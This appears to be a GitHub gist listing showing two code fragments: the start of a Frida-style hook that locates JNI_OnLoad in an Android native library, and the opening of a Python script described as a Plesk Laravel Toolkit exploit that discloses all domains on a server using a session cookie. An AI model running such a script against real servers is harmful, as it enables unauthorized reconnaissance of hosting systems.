This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function hookNative() { | |
const jniOnLoad = moduleHandle.findExportByName("JNI_OnLoad"); | |
if (!jniOnLoad) { | |
console.log("[-] JNI_OnLoad not found!"); | |
return; | |
} | |
console.log("[+] JNI_OnLoad founded:", jniOnLoad); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
import json | |
import re | |
# Plesk Laravel Toolkit - Disclosure of All Domains on the Server | |
if len(sys.argv) < 5: | |
print("\n" + " usage: python "+sys.argv[0]+" test.com 500 YOUR_AUTH_COOKIE output.txt") | |
print('\n [!] Paste the "PLESKSESSID_INSECURE" cookie value of the logged in user into YOUR_AUTH_COOKIE.') |